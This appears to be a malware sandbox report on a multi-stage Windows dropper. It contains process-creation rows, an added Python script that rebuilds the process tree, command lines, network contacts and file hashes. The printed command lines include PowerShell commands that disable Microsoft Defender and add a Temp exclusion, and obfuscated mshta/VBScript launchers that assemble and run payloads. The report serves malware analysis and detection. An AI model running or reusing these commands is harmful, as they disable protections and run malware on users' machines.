PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
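The rows above are flat, and each parent/child pair is repeated several times because the sandbox logs every WriteProcessMemory call a parent makes into a freshly created child. The following Python rebuilds the process tree from those rows. It is an added example written for this page, not part of the sandbox report or its vendor's tooling; it assumes the four-column row layout used here (Description, Indicator, Process, Target separated by single spaces, image paths without spaces, which holds for every row in this report), and the names parse_rows, build_tree, ancestry and render are my own. The sample rows are copied from the table above.

```python
"""Rebuild a process tree from flattened 'Suspicious use of
WriteProcessMemory' rows (added example; names are my own)."""
import re
from collections import Counter, defaultdict
from typing import Dict, List, NamedTuple, Tuple

# Constructed input: seven rows copied from the behavioral1 table. The
# repeated 2500 -> 2592 row shows why edges need de-duplicating.
SAMPLE_ROWS = r"""
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"""

# Description column, Indicator column (N/A), Process path, Target path.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \S+ (\S+) (\S+)$")


class WriteEvent(NamedTuple):
    parent_pid: int
    child_pid: int
    parent_image: str
    child_image: str


class ProcessTree(NamedTuple):
    parent_of: Dict[int, int]                # child pid -> parent pid
    children_of: Dict[int, List[int]]        # parent pid -> child pids
    image_of: Dict[int, str]                 # pid -> full image path
    write_count: Dict[Tuple[int, int], int]  # (parent, child) -> rows seen


def parse_rows(text: str) -> List[WriteEvent]:
    """Turn table rows into events; header lines and other shapes are skipped."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            ppid, cpid, pimg, cimg = m.groups()
            events.append(WriteEvent(int(ppid), int(cpid), pimg, cimg))
    return events


def build_tree(events: List[WriteEvent]) -> ProcessTree:
    """Collapse repeated writes into one edge per (parent, child), keeping a count.

    Several writes into a new child are the normal process-creation pattern,
    so the count is informational, not a separate alert."""
    parent_of: Dict[int, int] = {}
    children_of: Dict[int, List[int]] = defaultdict(list)
    image_of: Dict[int, str] = {}
    counts: Counter = Counter()
    for ev in events:
        counts[(ev.parent_pid, ev.child_pid)] += 1
        image_of.setdefault(ev.parent_pid, ev.parent_image)
        image_of.setdefault(ev.child_pid, ev.child_image)
        if ev.child_pid not in parent_of:   # first sighting defines the edge
            parent_of[ev.child_pid] = ev.parent_pid
            children_of[ev.parent_pid].append(ev.child_pid)
    return ProcessTree(parent_of, dict(children_of), image_of, dict(counts))


def roots(tree: ProcessTree) -> List[int]:
    """PIDs that wrote into others but were never written into."""
    return sorted(pid for pid in tree.image_of if pid not in tree.parent_of)


def ancestry(tree: ProcessTree, pid: int) -> List[int]:
    """Chain from the root down to pid, e.g. sample -> installer -> cmd -> powershell."""
    chain = [pid]
    while chain[-1] in tree.parent_of:
        chain.append(tree.parent_of[chain[-1]])
    return chain[::-1]


def render(tree: ProcessTree) -> str:
    """Indented tree, one process per line, using the image basename."""
    lines: List[str] = []

    def walk(pid: int, depth: int) -> None:
        name = tree.image_of[pid].rsplit("\\", 1)[-1]
        lines.append(f"{'  ' * depth}{pid} {name}")
        for child in sorted(tree.children_of.get(pid, [])):
            walk(child, depth + 1)

    for root in roots(tree):
        walk(root, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    tree = build_tree(parse_rows(SAMPLE_ROWS))
    print(render(tree))
    for (ppid, cpid), n in sorted(tree.write_count.items()):
        print(f"{ppid} -> {cpid}: {n} write(s)")
```

Run on the full table, the tree shows the chain this report describes: the sample spawns setup_installer.exe, which unpacks into the 7zS02AB0786 folder and runs setup_install.exe, which fans out through one cmd.exe per payload; the first two cmd.exe children are the ones that launch PowerShell.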

Processes

C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 272

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$A0192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe"

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$B0192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 460

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 marianu.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
N/A 127.0.0.1:49285 tcp
N/A 127.0.0.1:49287 tcp
US 8.8.8.8:53 ppgggb.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
NL 194.104.136.5:46013 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 104.26.3.46:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 www.microsoft.com udp
NO 96.6.17.223:80 www.microsoft.com tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 72.247.176.59:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 c12fe256228c8c0403ef35279aca6f58
SHA1 840a4eaf832f3cd154f0766dbc415a32c181e200
SHA256 86271c0587581b77766414a1238238011c10a5a06255b4611ac3b058f4529c2b
SHA512 88689761f0eeedc4ff633744dab15b26ad7352bda1f0329ed920dce463118ea11a14249cfd636aa3d39dbdabbcb1342138b7b5255a3791faf8ad955c63f5ff11

\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe

MD5 47a5d34f871487a79975e5586e63ebdd
SHA1 75f4f1708c2b0a6433f8c0fa6ff47799115b2d2f
SHA256 884c76e10ef7f202b677c0ccfb6e9e009ca79e7189e76509a6449b5f8c2a952f
SHA512 3f96662af4937647a78a0a51cb4916f56ee250ab14094ed608344d727489eb0135b4016a73853ca1f96b165fbe9ac7957adb1cc884fff55cea837f668b157d04

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2812-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS02AB0786\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2812-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-83-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-82-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS02AB0786\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS02AB0786\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14d32a38896785b13.exe

MD5 148c3657379750b2fe7237ac1b06f507
SHA1 c464da9412a32ab71cd62491405296672c7ba3ad
SHA256 41a780cbf232d3ed4912406bdbb084f61c9faf56dcc0a7a81381546689170c64
SHA512 360588010bda2d3d514508fe9f2f95f63ca7a78476e24043985c350814c54f25c1f60c45e68e4431c2301f90b4092f88866624b12eb637145403592e7218d6bc

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe

MD5 77666d51bc3fc167013811198dc282f6
SHA1 18e03eb6b95fd2e5b51186886f661dcedc791759
SHA256 6a3d44d750ba258b1854431d89db135abc5d543ada1b384c5306e98031b8f1c9
SHA512 a024f008567a7417fe975063f661a0b278fb70c7576a7453e482f2e3f5c6cc48b5faaa55ec197e3082626faaa3598c9ff7bcca798ba7a1408bf666e61fdf4cd0

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe

MD5 4d255e96e5056f2c899884babcc55691
SHA1 44caeb1df6288c94081b805ee17f66db34dc7834
SHA256 e7678a0537796c6199bbc7fc5c143b475280564558250df218d62012c3b98506
SHA512 ad2cebd784a525d3fe2e3523c4f3d2ab793da84811a41b08aae99141d9c53f545b180d36f05647ddef04bba200b6a0fc917e481913f3b2b0162c136ec8355c44

memory/1084-132-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe

MD5 8e0abf31bbb7005be2893af10fcceaa9
SHA1 a48259c2346d7aed8cf14566d066695a8c2db55c
SHA256 2df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512 ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XHM9ZABCM83EO8K3Z5VR.temp

MD5 ca32eabf1ff39cab952641aa57105242
SHA1 53a02fde7e6409608c85e03ee79e36a5bba8b422
